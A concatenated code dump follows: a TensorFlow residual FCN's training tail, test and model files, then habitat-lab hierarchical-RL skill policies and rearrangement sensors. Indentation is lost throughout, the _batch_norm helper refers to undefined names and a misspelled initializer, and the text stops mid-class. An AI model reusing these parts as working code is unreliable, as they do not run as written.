plt.imshow(sess_output[4][ind,:,:,int(config.LABEL_SIZE[-1]/2)])
plt.title(sess_output[5][ind].decode())
plt.subplot(133)
plt.imshow(sess_output[2][ind,:,:,int(config.LABEL_SIZE[-1]/2)])
# plt.show()
plt.savefig(os.path.join(config.train_dir,'fig/pred%d.png'%step))
# Summary the training process.
if step % config.num_steps_summary == 0:
summary_str = sess_output[-1]
summary_writer.add_summary(summary_str,step)
if step % config.num_steps_checkpoint == 0:
checkpoint_path = os.path.join(config.train_dir,'checkpoint','model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
step=sess.run(global_step)
except tf.errors.OutOfRangeError:
print('Running %d steps.'%step)
finally:
coord.request_stop()
coord.join(threads)
sess.close()
config.close_all()
def main(argv=None): # pylint: disable=unused-argument
os.environ['CUDA_VISIBLE_DEVICES'] = config.gpu_device
train()
if __name__ == '__main__':
tf.app.run()
```
#### File: code/test/resfcn_test.py
```python
import sys
import os.path
from datetime import datetime
import time
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import test_config as config
from test_config import logger
import test_model as resfcn
import test_input
def test():
inputs = test_input.TEST_INPUT();
# Get images and labels for FCN.
image = tf.placeholder(tf.float32,shape=[None,None,config.IMAGE_SIZE[2]],name='image_placeholder');
precrop = tf.image.resize_image_with_crop_or_pad(image,900,1600)
crop = tf.image.resize_images(precrop,[450,800])
images = tf.expand_dims(crop,0)
images = (images-128)/128
print('inputs initialize.')
# Build a Graph that computes the score map predictions from the
# inference model.
preds = resfcn.inference(images)
# tf.image_summary('preds',preds[:,:,:,int(config.LABEL_SIZE[-1]/2)],max_images=int(config.batch_size/2))
print('inference initialize.')
# Create a saver.
saver = tf.train.Saver(tf.all_variables(),name='saver')
print('saver initialize.')
# Start running operations on the Graph.
sess = tf.Session(config=config.session_config)
saver.restore(sess,config.restore_path)
logger.info('load from %s',config.restore_path)
print('test begins.')
while inputs.isValid:
# try:
scan_time = datetime.now().strftime('%H:%M')
image_batch = inputs.next_fig()
# except Exception:
# logger.info('encounter with error. Abort fig %s.'%inputs.figName)
# inputs.next_fig()
# continue
start_time = time.time()
crop_image,heatmap = sess.run([crop,preds],feed_dict = {image:image_batch})
duration = time.time() - start_time
# num_examples_per_step = inputs.batch_size
# examples_per_sec = num_examples_per_step / duration
# sec_per_batch = float(duration)
format_str = ('%s: %s (%.3f sec/fig)')
print (format_str % (scan_time, inputs.figName, duration))
inputs.save(crop_image,heatmap)
sess.close()
config.close_all()
def main(argv=None): # pylint: disable=unused-argument
os.environ['CUDA_VISIBLE_DEVICES'] = config.gpu_device
test()
if __name__ == '__main__':
tf.app.run()
```
#### File: code/test/test_input.py
```python
import os
import random
import numpy as np
from scipy import ndimage
from scipy import misc
import scipy.io as sio
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
# from matplotlib.patches import Rectangle
import tensorflow as tf
import test_config as config
from test_config import logger
class TEST_INPUT:
def __init__(self):
self.batch_size = config.batch_size
self.fig_list = os.listdir(config.test_dir)
self.curFig = -1
self.figName = None
self.numFig = len(self.fig_list)
self.isValid = self.numFig>0
def next_fig(self):
if self.isValid == False:
return None
self.curFig += 1
if self.curFig+1>=self.numFig:
self.isValid = False
filename = self.fig_list[self.curFig]
self.image = mpimg.imread(os.path.join(config.test_dir,filename))
self.image = misc.imresize(self.image,0.8)
# plt.imshow(self.image)
# plt.show()
# image = np.expand_dims(image,0)
self.figName,_ = os.path.splitext(filename)
return self.image
def save(self,image,heatmap):
heatmap = np.squeeze(heatmap)
conn,numCandidate = ndimage.label(heatmap>=config.thresh)
candis = ndimage.find_objects(conn)
# plt.imshow(256-image)
# plt.show()
for candi in candis:
image[candi[0].start:candi[0].stop,candi[1].start,0]= 0
image[candi[0].start:candi[0].stop,candi[1].start,1]= 255
image[candi[0].start:candi[0].stop,candi[1].start,2]= 0
image[candi[0].start:candi[0].stop,candi[1].stop-1,0]= 0
image[candi[0].start:candi[0].stop,candi[1].stop-1,1]= 255
image[candi[0].start:candi[0].stop,candi[1].stop-1,2]= 0
image[candi[0].start,candi[1].start:candi[1].stop,0] = 0
image[candi[0].start,candi[1].start:candi[1].stop,1] = 255
image[candi[0].start,candi[1].start:candi[1].stop,2] = 0
image[candi[0].stop-1,candi[1].start:candi[1].stop,0] = 0
image[candi[0].stop-1,candi[1].start:candi[1].stop,1] = 255
image[candi[0].stop-1,candi[1].start:candi[1].stop,2] = 0 # ly = candi[0].start
# height = candi[0].stop-candi[0].start
# lx = candi[1].start
# width = candi[1].stop-candi[1].start
# plt.gca.add_patch(Rectangle((lx,ly),width,height,fill=None,alpha=1))
image = 256-image
mpimg.imsave(os.path.join(config.output_dir,'pred','%s_bbxs.jpg'%self.figName),image)
mpimg.imsave(os.path.join(config.output_dir,'pred','%s_heatmap.jpg'%self.figName),heatmap)
```
#### File: code/test/test_model.py
```python
import os
import sys
import numpy as np
import tensorflow as tf
import test_input
import test_config as config
from test_config import logger
# Global constants describing the Residue FCN model.
## Standard deviation for initialization
CONV_STDDEV = config.CONV_STDDEV
BIAS_STDDEV = config.BIAS_STDDEV
DECONV_STDDEV = config.DECONV_STDDEV
## Weight decay
CONV_WD = config.CONV_WD
BIAS_WD = config.BIAS_WD
DECONV_WD = config.DECONV_WD
def _get_variable(name, shape, initializer,
weight_decay=None,dtype=tf.float32,trainable=True):
# Optionally add weigth decay according to weight_decay
if weight_decay is not None:
regularizer = tf.contrib.layers.l2_regularizer(weight_decay)
else:
regularizer = None
var = tf.get_variable(name=name,shape=shape,
initializer=initializer,dtype=dtype,
regularizer=regularizer,trainable=trainable)
return var
def _get_filter_stddev(kernel_size,channel_size):
filter_stddev = np.sqrt(2.0/(kernel_size[0]*kernel_size[1]*channel_size))
return filter_stddev
def _conv2d(input_op, kernel_shape, op_name='conv2d',
stride = None, padding='SAME',
conv_stddev = CONV_STDDEV, conv_wd=CONV_WD):
if conv_stddev is None:
conv_stddev = _get_filter_stddev(kernel_shape[0:2],kernel_shape[2])
if stride is None:
stride = [1, 1, 1, 1]
kernel = _get_variable(name='conv_kernel',shape=kernel_shape,
initializer=tf.truncated_normal_initializer(stddev=conv_stddev),
weight_decay=conv_wd)
conv = tf.nn.conv2d(input_op, kernel, strides=stride, padding=padding,name=op_name)
return conv
def _conv2d_bias(input_op, kernel_shape, op_name='conv2d_bias',
stride = None, padding='SAME',
conv_stddev = CONV_STDDEV, conv_wd=CONV_WD,
bias_stddev = BIAS_STDDEV, bias_wd=BIAS_WD):
with tf.variable_scope(op_name) as scope:
conv = _conv2d(input_op, kernel_shape,
stride=stride, padding=padding,
conv_stddev = conv_stddev, conv_wd=conv_wd)
bias = _get_variable('bias',shape=kernel_shape[3],
initializer=tf.truncated_normal_initializer(stddev=bias_stddev),weight_decay=bias_wd)
conv_bias = tf.nn.bias_add(conv, bias, name='conv2d_bias')
return conv_bias
def _batch_norm(input_op,channel_size,op_name='batch_norm'):
with tf.variable_scope(op_name) as scope:
offset = _get_variable(name='offset',shape=channel_size,initializer=tf.zeros_initializer)
scale = _get_variable(name='scale',shape=channel_size,initializer=tf.ones_initialzer)
moving_mean = tf.get_variable(name='moving_mean',shape=channel_size,
initializer=tf.zeros_initializer,trainable=False)
moving_variance = tf.get_variable(name='moving_variance',shape=channel_size,
initializer=tf.ones_initialzer,trainable=False)
mean,variance = tf.nn.moments(input_op,axes=[0,1,2])
update_moving_mean = moving_averages.assign_moving_average(moving_mean,mean,MOVING_AVERAGE_DECAY)
update_moving_variance = moving_averages.assign_moving_average(moving_variance,variance,MOVING_AVERAGE_DECAY)
tf.add_to_collection('UPDATE_OP',update_moving_mean)
tf.add_to_collection('UPDATE_OP',update_moving_variance)
if FLAGS.is_training:
norm = tf.nn.batch_normalization(deconv,moving_mean,moving_variance,offset,scale,BN_EPSILON)
else:
norm = tf.nn.batch_normalization(deconv,mean,var,offset,scale,BN_EPSILON)
return norm
def _conv_layer(input_op, kernel_shape, op_name='conv_layer',
stride=None, padding='SAME',
batch_norm=False, activation=tf.nn.elu,
conv_stddev = CONV_STDDEV, conv_wd=CONV_WD,
bias_stddev = BIAS_STDDEV, bias_wd=BIAS_WD):
with tf.variable_scope(op_name) as scope:
pre_activation = _conv2d_bias(input_op, kernel_shape, stride=stride, padding=padding,
conv_stddev = conv_stddev, conv_wd=conv_wd, bias_stddev = bias_stddev, bias_wd=bias_wd)
if batch_norm:
pre_activation = _batch_norm(pre_activation)
if activation is not None:
conv = activation(pre_activation)
else:
conv = pre_activation
if config.is_training:
print('conv layer:%s is established'%op_name)
logger.debug(str(conv))
return conv
def _deconv_layer(input_op, kernel_shape, shape_op, op_name='deconv_layer',
stride=None, padding='SAME',
deconv_stddev=DECONV_STDDEV, deconv_wd=DECONV_WD):
if deconv_stddev is None:
deconv_stddev = _get_filter_stddev(kernel_shape[0:2],kernel_shape[3])
if stride is None:
stride = [1,2,2,1]
with tf.variable_scope(op_name) as scope:
kernel = _get_variable(name='deconv_kernel', shape = kernel_shape,
initializer=tf.truncated_normal_initializer(stddev=deconv_stddev),
weight_decay=deconv_wd)
deconv = tf.nn.conv2d_transpose(input_op, kernel,
output_shape= shape_op,
strides=stride, padding=padding,name='deconv')
if config.is_training:
print('deconv layer:%s is established...'%op_name)
logger.debug(str(deconv))
return deconv
def _pool_layer(input_op, op_name='pool_layer', pooling=tf.nn.max_pool):
with tf.variable_scope(op_name) as scope:
pool = pooling(input_op, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
if config.is_training:
print('pool layer:%s is established...'%op_name)
logger.debug(str(pool))
return pool
def _unpool_layer(input_op, size=None, op_name='unpool_layer'):
if size is None:
size = 2*(tf.shape(input_op)[1:3])
with tf.variable_scope(op_name) as scope:
unpool = tf.image.resize_images(input_op, size=size)
if config.is_training:
print('unpool layer:%s is established...'%op_name)
logger.debug(str(unpool))
return unpool
def _residue_block(input_op, residue_op, kernel_shape,
op_name='residue_block', activation=tf.nn.elu, batch_norm=False,
conv_stddev = CONV_STDDEV, conv_wd=CONV_WD,
bias_stddev = BIAS_STDDEV, bias_wd=BIAS_WD):
with tf.variable_scope(op_name) as scope:
conv1 = _conv_layer(input_op,kernel_shape,op_name='residue_conv1',
batch_norm=batch_norm, activation=activation,
conv_stddev = conv_stddev, bias_stddev = bias_stddev,
conv_wd=conv_wd, bias_wd=bias_wd)
conv2 = _conv_layer(input_op,kernel_shape,op_name='residue_conv2',
batch_norm=batch_norm, activation=None,
conv_stddev = conv_stddev, bias_stddev = bias_stddev,
conv_wd=conv_wd, bias_wd=bias_wd)
addition = tf.add(residue_op,conv2,name='addition')
if activation is not None:
residue = activation(addition)
else:
residue = addition
if config.is_training:
print('residue block:%s is established...'%op_name)
logger.debug(str(residue))
return residue
def inference(images):
# Convolution
# stage1
conv1_1 = _conv_layer(input_op=images, op_name='conv1_1', kernel_shape=[1,1,images.get_shape().as_list()[-1],32])
block1_1 = _residue_block(input_op=conv1_1,residue_op=conv1_1, op_name='block1_1', kernel_shape=[3,3,32,32])
block1_2 = _residue_block(input_op=block1_1,residue_op=block1_1, op_name='block1_2', kernel_shape=[3,3,32,32])
pool1 = _pool_layer(block1_2,'pool1')
# stage2
conv2_1 = _conv_layer(input_op=pool1, op_name='conv2_1', kernel_shape=[1,1,32,64])
block2_1 = _residue_block(input_op=conv2_1,residue_op=conv2_1, op_name='block2_1', kernel_shape=[3,3,64,64])
block2_2 = _residue_block(input_op=block2_1,residue_op=block2_1, op_name='block2_2', kernel_shape=[3,3,64,64])
pool2 = _pool_layer(block2_2,'pool2')
# stage3
conv3_1 = _conv_layer(input_op=pool2, op_name='conv3_1', kernel_shape=[1,1,64,128])
block3_1 = _residue_block(input_op=conv3_1,residue_op=conv3_1, op_name='block3_1', kernel_shape=[3,3,128,128])
block3_2 = _residue_block(input_op=block3_1,residue_op=block3_1, op_name='block3_2', kernel_shape=[3,3,128,128])
pool3 = _pool_layer(block3_2,'pool3')
# stage4
conv4_1 = _conv_layer(input_op=pool3, op_name='conv4_1', kernel_shape=[1,1,128,256])
block4_1 = _residue_block(input_op=conv4_1,residue_op=conv4_1, op_name='block4_1', kernel_shape=[3,3,256,256])
block4_2 = _residue_block(input_op=block4_1,residue_op=block4_1, op_name='block4_2', kernel_shape=[3,3,256,256])
pool4 = _pool_layer(block4_2,'pool4')
# stage5
conv5_1 = _conv_layer(input_op=pool4, op_name='conv5_1', kernel_shape=[1,1,256,512])
block5_1 = _residue_block(input_op=conv5_1,residue_op=conv5_1, op_name='block5_1', kernel_shape=[3,3,512,512])
block5_2 = _residue_block(input_op=block5_1,residue_op=block5_1, op_name='block5_2', kernel_shape=[3,3,512,512])
# upsample and fuse
deconv4_1 = _deconv_layer(input_op=block5_2, op_name='deconv4_1',
shape_op= tf.shape(block4_2), kernel_shape=[2,2,256,512])
block4_3 = _residue_block(input_op=deconv4_1,residue_op=block4_2, op_name='block4_3', kernel_shape=[3,3,256,256])
block4_4 = _residue_block(input_op=block4_3,residue_op=block4_3, op_name='block4_4', kernel_shape=[3,3,256,256])
deconv3_1 = _deconv_layer(input_op=block4_4, op_name='deconv3_1',
shape_op= tf.shape(block3_2), kernel_shape=[2,2,128,256])
block3_3 = _residue_block(input_op=deconv3_1,residue_op=block3_2, op_name='block3_3', kernel_shape=[3,3,128,128])
block3_4 = _residue_block(input_op=block3_3,residue_op=block3_3, op_name='block3_4', kernel_shape=[3,3,128,128])
deconv2_1 = _deconv_layer(input_op=block3_4, op_name='deconv2_1',
shape_op= tf.shape(block2_2), kernel_shape=[2,2,64,128])
block2_3 = _residue_block(input_op=deconv2_1,residue_op=block2_2, op_name='block2_3', kernel_shape=[3,3,64,64])
block2_4 = _residue_block(input_op=block2_3,residue_op=block2_3, op_name='block2_4', kernel_shape=[3,3,64,64])
deconv1_1 = _deconv_layer(input_op=block2_4, op_name='deconv1_1',
shape_op= tf.shape(block1_2), kernel_shape=[2,2,32,64])
block1_3 = _residue_block(input_op=deconv1_1,residue_op=block1_2, op_name='block1_3', kernel_shape=[3,3,32,32])
block1_4 = _residue_block(input_op=block1_3,residue_op=block1_3, op_name='block1_4', kernel_shape=[3,3,32,32])
conv1_3 = _conv2d_bias(input_op=block1_4, kernel_shape = [1,1,32,1], op_name='conv1_3')
# sigmoid
preds = tf.sigmoid(conv1_3,name='pred')
#conv1_3 = _conv_layer(input_op=block1_4, op_name='conv1_3', kernel_shape=[3,3,32,1])
#conv1_4 = _conv_layer(input_op=block1_4, op_name='conv1_4', kernel_shape=[3,3,32,1])
## softmax
#with tf.variable_scope('pred') as scope:
#pred1 = tf.exp(conv1_3,name='pred1')
#pred2 = tf.exp(conv1_4,name='pred2')
#preds = tf.truediv(pred1,tf.add(pred1,pred2),name='softmax')
return preds
``` |
{
"source": "Jiayuan-Gu/habitat-lab",
"score": 2
} |
#### File: hrl/skills/art_obj.py
```python
from typing import List, Tuple
import torch
from habitat.tasks.rearrange.rearrange_sensors import (
IsHoldingSensor,
RelativeRestingPositionSensor,
)
from habitat_baselines.rl.hrl.skills.nn_skill import NnSkillPolicy
class ArtObjSkillPolicy(NnSkillPolicy):
def on_enter(
self,
skill_arg: List[str],
batch_idx: int,
observations,
rnn_hidden_states,
prev_actions,
) -> Tuple[torch.Tensor, torch.Tensor]:
super().on_enter(
skill_arg, batch_idx, observations, rnn_hidden_states, prev_actions
)
self._did_leave_start_zone = torch.zeros(
self._batch_size, device=prev_actions.device
)
self._episode_start_resting_pos = observations[
RelativeRestingPositionSensor.cls_uuid
]
def _is_skill_done(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
) -> torch.BoolTensor:
cur_resting_pos = observations[RelativeRestingPositionSensor.cls_uuid]
did_leave_start_zone = (
torch.norm(
cur_resting_pos - self._episode_start_resting_pos, dim=-1
)
> self._config.START_ZONE_RADIUS
)
self._did_leave_start_zone = torch.logical_or(
self._did_leave_start_zone, did_leave_start_zone
)
cur_resting_dist = torch.norm(
observations[RelativeRestingPositionSensor.cls_uuid], dim=-1
)
is_within_thresh = cur_resting_dist < self._config.AT_RESTING_THRESHOLD
is_holding = (
observations[IsHoldingSensor.cls_uuid].view(-1).type(torch.bool)
)
is_not_holding = ~is_holding
return is_not_holding & is_within_thresh & self._did_leave_start_zone
def _parse_skill_arg(self, skill_arg):
self._internal_log(f"Parsing skill argument {skill_arg}")
return int(skill_arg[-1].split("|")[1])
```
#### File: hrl/skills/nn_skill.py
```python
import gym.spaces as spaces
import numpy as np
import torch
from habitat.config import Config as CN
from habitat.core.spaces import ActionSpace
from habitat_baselines.common.baseline_registry import baseline_registry
from habitat_baselines.common.logging import baselines_logger
from habitat_baselines.common.tensor_dict import TensorDict
from habitat_baselines.rl.hrl.skills.skill import SkillPolicy
from habitat_baselines.utils.common import get_num_actions
def truncate_obs_space(space: spaces.Box, truncate_len: int) -> spaces.Box:
"""
Returns an observation space with taking on the first `truncate_len` elements of the space.
"""
return spaces.Box(
low=space.low[..., :truncate_len],
high=space.high[..., :truncate_len],
dtype=np.float32,
)
class NnSkillPolicy(SkillPolicy):
"""
Defines a skill to be used in the TP+SRL baseline.
"""
def __init__(
self,
wrap_policy,
config,
action_space: spaces.Space,
filtered_obs_space: spaces.Space,
filtered_action_space: spaces.Space,
batch_size,
should_keep_hold_state: bool = False,
):
"""
:param action_space: The overall action space of the entire task, not task specific.
"""
super().__init__(
config, action_space, batch_size, should_keep_hold_state
)
self._wrap_policy = wrap_policy
self._filtered_obs_space = filtered_obs_space
self._filtered_action_space = filtered_action_space
self._ac_start = 0
self._ac_len = get_num_actions(filtered_action_space)
for k, space in action_space.items():
if k not in filtered_action_space.spaces.keys():
self._ac_start += get_num_actions(space)
else:
break
self._internal_log(
f"Skill {self._config.skill_name}: action offset {self._ac_start}, action length {self._ac_len}"
)
def parameters(self):
if self._wrap_policy is not None:
return self._wrap_policy.parameters()
else:
return []
@property
def num_recurrent_layers(self):
if self._wrap_policy is not None:
return self._wrap_policy.net.num_recurrent_layers
else:
return 0
def to(self, device):
super().to(device)
if self._wrap_policy is not None:
self._wrap_policy.to(device)
def _get_filtered_obs(self, observations, cur_batch_idx) -> TensorDict:
return TensorDict(
{
k: observations[k]
for k in self._filtered_obs_space.spaces.keys()
}
)
def _internal_act(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
cur_batch_idx,
deterministic=False,
):
filtered_obs = self._get_filtered_obs(observations, cur_batch_idx)
filtered_prev_actions = prev_actions[
:, self._ac_start : self._ac_start + self._ac_len
]
filtered_obs = self._select_obs(filtered_obs, cur_batch_idx)
_, action, _, rnn_hidden_states = self._wrap_policy.act(
filtered_obs,
rnn_hidden_states,
filtered_prev_actions,
masks,
deterministic,
)
full_action = torch.zeros(prev_actions.shape)
full_action[:, self._ac_start : self._ac_start + self._ac_len] = action
return full_action, rnn_hidden_states
@classmethod
def from_config(cls, config, observation_space, action_space, batch_size):
# Load the wrap policy from file
if len(config.LOAD_CKPT_FILE) == 0:
raise ValueError(
f"Skill {config.skill_name}: Need to specify LOAD_CKPT_FILE"
)
ckpt_dict = torch.load(config.LOAD_CKPT_FILE, map_location="cpu")
policy = baseline_registry.get_policy(config.name)
policy_cfg = ckpt_dict["config"]
if "GYM" not in policy_cfg.TASK_CONFIG:
# Support loading legacy policies
# TODO: Remove this eventually and drop support for policies
# trained on older version of codebase.
policy_cfg.defrost()
policy_cfg.TASK_CONFIG.GYM = CN()
policy_cfg.TASK_CONFIG.GYM.OBS_KEYS = list(
set(
policy_cfg.RL.POLICY.include_visual_keys
+ policy_cfg.RL.GYM_OBS_KEYS
)
)
policy_cfg.freeze()
expected_obs_keys = policy_cfg.TASK_CONFIG.GYM.OBS_KEYS
filtered_obs_space = spaces.Dict(
{k: observation_space.spaces[k] for k in expected_obs_keys}
)
for k in config.OBS_SKILL_INPUTS:
space = filtered_obs_space.spaces[k]
# There is always a 3D position
filtered_obs_space.spaces[k] = truncate_obs_space(space, 3)
baselines_logger.debug(
f"Skill {config.skill_name}: Loaded observation space {filtered_obs_space}",
)
filtered_action_space = ActionSpace(
{
k: action_space[k]
for k in policy_cfg.TASK_CONFIG.TASK.POSSIBLE_ACTIONS
}
)
if "ARM_ACTION" in filtered_action_space.spaces and (
policy_cfg.TASK_CONFIG.TASK.ACTIONS.ARM_ACTION.GRIP_CONTROLLER
is None
):
filtered_action_space["ARM_ACTION"] = spaces.Dict(
{
k: v
for k, v in filtered_action_space["ARM_ACTION"].items()
if k != "grip_action"
}
)
baselines_logger.debug(
f"Loaded action space {filtered_action_space} for skill {config.skill_name}",
)
actor_critic = policy.from_config(
policy_cfg, filtered_obs_space, filtered_action_space
)
try:
actor_critic.load_state_dict(
{ # type: ignore
k[len("actor_critic.") :]: v
for k, v in ckpt_dict["state_dict"].items()
}
)
except Exception as e:
raise ValueError(
f"Could not load checkpoint for skill {config.skill_name} from {config.LOAD_CKPT_FILE}"
) from e
return cls(
actor_critic,
config,
action_space,
filtered_obs_space,
filtered_action_space,
batch_size,
)
```
#### File: hrl/skills/wait.py
```python
from typing import Any
import gym.spaces as spaces
import torch
from habitat_baselines.rl.hrl.skills.skill import SkillPolicy
class WaitSkillPolicy(SkillPolicy):
def __init__(
self,
config,
action_space: spaces.Space,
batch_size,
):
super().__init__(config, action_space, batch_size, True)
self._wait_time = -1
def _parse_skill_arg(self, skill_arg: str) -> Any:
self._wait_time = int(skill_arg[0])
self._internal_log(f"Requested wait time {self._wait_time}")
def _is_skill_done(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
) -> torch.BoolTensor:
assert self._wait_time > 0
return self._cur_skill_step >= self._wait_time
def _internal_act(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
cur_batch_idx,
deterministic=False,
):
action = torch.zeros(prev_actions.shape, device=prev_actions.device)
return action, rnn_hidden_states
```
#### File: tasks/rearrange/rearrange_sensors.py
```python
import numpy as np
from gym import spaces
from habitat.core.embodied_task import Measure
from habitat.core.registry import registry
from habitat.core.simulator import Sensor, SensorTypes
from habitat.tasks.nav.nav import PointGoalSensor
from habitat.tasks.rearrange.rearrange_sim import RearrangeSim
from habitat.tasks.rearrange.utils import (
CollisionDetails,
batch_transform_point,
rearrange_logger,
)
from habitat.tasks.utils import cartesian_to_polar, get_angle
class MultiObjSensor(PointGoalSensor):
"""
Abstract parent class for a sensor that specifies the locations of all targets.
"""
def __init__(self, *args, task, **kwargs):
self._task = task
self._sim: RearrangeSim
super(MultiObjSensor, self).__init__(*args, task=task, **kwargs)
def _get_observation_space(self, *args, **kwargs):
n_targets = self._task.get_n_targets()
return spaces.Box(
shape=(n_targets * 3,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
@registry.register_sensor
class TargetCurrentSensor(MultiObjSensor):
"""
This is the ground truth object position sensor relative to the robot end-effector coordinate frame.
"""
cls_uuid: str = "obj_goal_pos_sensor"
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(
shape=(3,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, *args, **kwargs):
self._sim: RearrangeSim
T_inv = self._sim.robot.ee_transform.inverted()
idxs, _ = self._sim.get_targets()
scene_pos = self._sim.get_scene_pos()
pos = scene_pos[idxs]
for i in range(pos.shape[0]):
pos[i] = T_inv.transform_point(pos[i])
return pos.reshape(-1)
@registry.register_sensor
class TargetStartSensor(MultiObjSensor):
"""
Relative position from end effector to target object
"""
cls_uuid: str = "obj_start_sensor"
def get_observation(self, *args, observations, episode, **kwargs):
self._sim: RearrangeSim
global_T = self._sim.robot.ee_transform
T_inv = global_T.inverted()
pos = self._sim.get_target_objs_start()
return batch_transform_point(pos, T_inv, np.float32).reshape(-1)
class PositionGpsCompassSensor(Sensor):
def __init__(self, *args, sim, task, **kwargs):
self._task = task
self._sim = sim
super().__init__(*args, task=task, **kwargs)
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, config, **kwargs):
n_targets = self._task.get_n_targets()
self._polar_pos = np.zeros(n_targets * 2, dtype=np.float32)
return spaces.Box(
shape=(n_targets * 2,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def _get_positions(self) -> np.ndarray:
raise NotImplementedError("Must override _get_positions")
def get_observation(self, task, *args, **kwargs):
pos = self._get_positions()
robot_T = self._sim.robot.base_transformation
rel_pos = batch_transform_point(pos, robot_T.inverted(), np.float32)
for i, rel_obj_pos in enumerate(rel_pos):
rho, phi = cartesian_to_polar(rel_obj_pos[0], rel_obj_pos[1])
self._polar_pos[(i * 2) : (i * 2) + 2] = [rho, -phi]
return self._polar_pos
@registry.register_sensor
class TargetStartGpsCompassSensor(PositionGpsCompassSensor):
cls_uuid: str = "obj_start_gps_compass"
def _get_uuid(self, *args, **kwargs):
return TargetStartGpsCompassSensor.cls_uuid
def _get_positions(self) -> np.ndarray:
return self._sim.get_target_objs_start()
@registry.register_sensor
class TargetGoalGpsCompassSensor(PositionGpsCompassSensor):
cls_uuid: str = "obj_goal_gps_compass"
def _get_uuid(self, *args, **kwargs):
return TargetGoalGpsCompassSensor.cls_uuid
def _get_positions(self) -> np.ndarray:
_, pos = self._sim.get_targets()
return pos
@registry.register_sensor
class AbsTargetStartSensor(MultiObjSensor):
"""
Relative position from end effector to target object
"""
cls_uuid: str = "abs_obj_start_sensor"
def get_observation(self, observations, episode, *args, **kwargs):
pos = self._sim.get_target_objs_start()
return pos.reshape(-1)
@registry.register_sensor
class GoalSensor(MultiObjSensor):
"""
Relative to the end effector
"""
cls_uuid: str = "obj_goal_sensor"
def get_observation(self, observations, episode, *args, **kwargs):
global_T = self._sim.robot.ee_transform
T_inv = global_T.inverted()
_, pos = self._sim.get_targets()
return batch_transform_point(pos, T_inv, np.float32).reshape(-1)
@registry.register_sensor
class AbsGoalSensor(MultiObjSensor):
cls_uuid: str = "abs_obj_goal_sensor"
def get_observation(self, *args, observations, episode, **kwargs):
_, pos = self._sim.get_targets()
return pos.reshape(-1)
@registry.register_sensor
class JointSensor(Sensor):
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_uuid(self, *args, **kwargs):
return "joint"
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, config, **kwargs):
return spaces.Box(
shape=(config.DIMENSIONALITY,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, *args, **kwargs):
joints_pos = self._sim.robot.arm_joint_pos
return np.array(joints_pos, dtype=np.float32)
@registry.register_sensor
class JointVelocitySensor(Sensor):
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_uuid(self, *args, **kwargs):
return "joint_vel"
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, config, **kwargs):
return spaces.Box(
shape=(config.DIMENSIONALITY,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, *args, **kwargs):
joints_pos = self._sim.robot.arm_velocity
return np.array(joints_pos, dtype=np.float32)
@registry.register_sensor
class EEPositionSensor(Sensor):
cls_uuid: str = "ee_pos"
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
@staticmethod
def _get_uuid(*args, **kwargs):
return EEPositionSensor.cls_uuid
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(
shape=(3,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, *args, **kwargs):
trans = self._sim.robot.base_transformation
ee_pos = self._sim.robot.ee_transform.translation
local_ee_pos = trans.inverted().transform_point(ee_pos)
return np.array(local_ee_pos)
@registry.register_sensor
class RelativeRestingPositionSensor(Sensor):
cls_uuid: str = "relative_resting_position"
def _get_uuid(self, *args, **kwargs):
return RelativeRestingPositionSensor.cls_uuid
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(
shape=(3,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, task, *args, **kwargs):
base_trans = self._sim.robot.base_transformation
ee_pos = self._sim.robot.ee_transform.translation
local_ee_pos = base_trans.inverted().transform_point(ee_pos)
relative_desired_resting = task.desired_resting - local_ee_pos
return np.array(relative_desired_resting, dtype=np.float32)
@registry.register_sensor
class RestingPositionSensor(Sensor):
"""
Desired resting position in the robot coordinate frame.
"""
cls_uuid: str = "resting_position"
def _get_uuid(self, *args, **kwargs):
return RestingPositionSensor.cls_uuid
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(
shape=(3,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, task, *args, **kwargs):
return np.array(task.desired_resting)
@registry.register_sensor
class LocalizationSensor(Sensor):
cls_uuid = "localization_sensor"
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_uuid(self, *args, **kwargs):
return LocalizationSensor.cls_uuid
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(
shape=(4,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
